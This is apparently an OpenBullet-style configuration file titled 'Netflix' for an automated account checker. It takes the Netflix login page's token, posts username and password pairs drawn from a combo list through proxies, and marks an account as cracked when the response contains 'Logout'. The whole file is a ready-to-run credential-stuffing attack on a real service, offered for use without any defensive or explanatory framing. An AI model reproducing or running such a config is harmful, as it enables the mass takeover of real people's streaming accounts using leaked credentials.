[SETTINGS]
{
  "Name": "Netflix",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-14T21:08:04.2649739+02:00",
  "AdditionalInfo": "",
  "Author": "Ene",
  "Version": "1.3 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get REQUEST GET "https://www.netflix.com/al/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/al/login" 
  HEADER "Upgrade-Insecure-Requests: 1" 

#Token PARSE "<SOURCE>" CSS "[name=action]" "value" -> VAR "Token" 

#Post REQUEST POST "https://www.netflix.com/al/login" ParseQuery=TRUE 
  CONTENT "action=<Token>&login_type=normal&username=<USER>&password=<PASS>" 
  CONTENTTYPE "text/html; charset=utf-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/al/login" 
  HEADER "Upgrade-Insecure-Requests: 1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Logout" 
  KEYCHAIN Failure OR 
    KEY "Sorry" 

